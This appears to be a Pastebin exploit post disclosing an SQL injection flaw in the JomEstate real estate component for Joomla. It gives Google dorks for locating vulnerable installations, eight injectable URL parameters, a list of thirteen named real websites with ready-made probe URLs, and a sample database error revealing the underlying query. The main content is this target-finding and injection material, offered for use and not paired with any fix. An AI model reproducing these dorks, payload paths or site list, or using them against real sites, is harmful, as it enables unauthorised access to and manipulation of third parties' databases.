Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Joomla 2.5.28 Com_JomEstate Real Estate Components 4.1 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 29/08/2019
- # Vendor Homepage : comdev.eu/jomestate
- Joomla Affected Versions :
- Joomla 1.5.18 Joomla 1.5.26 - Joomla 1.6 - Joomla 1.7
- Joomla 2.5.0 - Joomla 2.5.2 - Joomla 2.5.8
- Joomla 2.5.17 - Joomla 2.5.20 - Joomla 2.5.28
- Software Affected Versions : 1.0 - 3.7 - 4.1
- Software Information Link :
- codecanyon.net/item/real-estate-ajax-search-mod-for-joomla-jomestate/5609277
- extensions.joomla.org/extension/jomestate-pro/
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/index.php?option=com_jomestate
- intext:Website design by AZ Group
- intext:Copyright © 2013 T.Re.C.C. Turismo Religioso
- intext:Copyright © 2013 T.Re.C.C. Turismo Religioso Cooperativo Campano
- intext:Diseño Web: Media Factoring, S.L.
- intext:Copyright © 2019 Bali Property and Bali Villa Rental Solution
- intext:Projekt i wykonanie www.printart.com.pl
- intext:Ingatlanban Otthon. Minden jog fenntartva.
- intext:© 2012 letsmovetogether.co.uk / Lets Move Together Ltd. All Rights Reserved
- intext:Designed by P.O.G
- intext:Developed by Web2Web
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Description about Software :
- ***************************
- Real Estate JomEstate component allows you to create an Real Estate Portal
- or Real Estate Agency Website in minutes.It is perfect for independent estate
- agents, property rental companies and property developers!
- ###################################################################
- # Impact :
- ***********
- Joomla Com_JomEstate Real Estate Extension 4.1 is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using
- it in an SQL query. Exploiting this issue could allow an attacker to compromise
- the application, access or modify data, or exploit latent vulnerabilities in the
- underlying database. A remote attacker can send a specially crafted request to the
- vulnerable application and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jomestate&task=detailed&ad_headline=[TOPIC-NAME]&id=[SQL Injection]
- /index.php?option=com_jomestate&task=detailed&id=&limitstart=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_jomestate&task=detailed&id=&limitstart=[SQL Injection]
- /index.php?option=com_jomestate&task=print&id=&format=print&tmpl=[SQL Injection]
- /index2.php?option=com_jomestate&task=print&id=[SQL Injection]&format=print
- /index.php?option=com_jomestate&task=print&id=[SQL Injection]
- /index.php?option=com_jomestate&task=detailed&id=[SQL Injection]
- /component/jomestate/print/id/tmpl/component?format=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] pepehouse.net/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] religioustourism.it/index.php?option=com_jomestate&task=detailed&ad_headline=TOPIC-NAME&id=1%27
- [+] cometothecrossroads.com/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] balichicvilla.com/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] besthouse-arona.com/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] agenziabrothers.com/ita2/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] zinzoproperties.co.za/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] geanieruchomosci.pl/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] trecc.it/index.php?option=com_jomestate&task=print&id=&format=print&tmpl=1%27
- [+] ingatlanbanotthon.hu/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] letsmovetogether.co.uk/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] haurysmith.com/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- [+] kuehne-wohnstil.de/index.php?option=com_jomestate&task=detailed&id=&limitstart=0&Itemid=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- DB function failed with error number 1064
- You have an error in your SQL syntax; check the manual that corresponds to your
- MySQL server version for the right syntax to use near 'AND b.published = 1 ORDER BY
- b.ordering ASC' at line 4 SQL=SELECT a.*,b.id AS key1, b.name,b.type,b.req_type FROM
- jos_cd_ads_attributes a JOIN jos_cd_attributes b ON a.attr_id = b.id WHERE a.add_id =
- AND b.published = 1 ORDER BY b.ordering ASC
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Add Comment
Please, Sign In to add comment
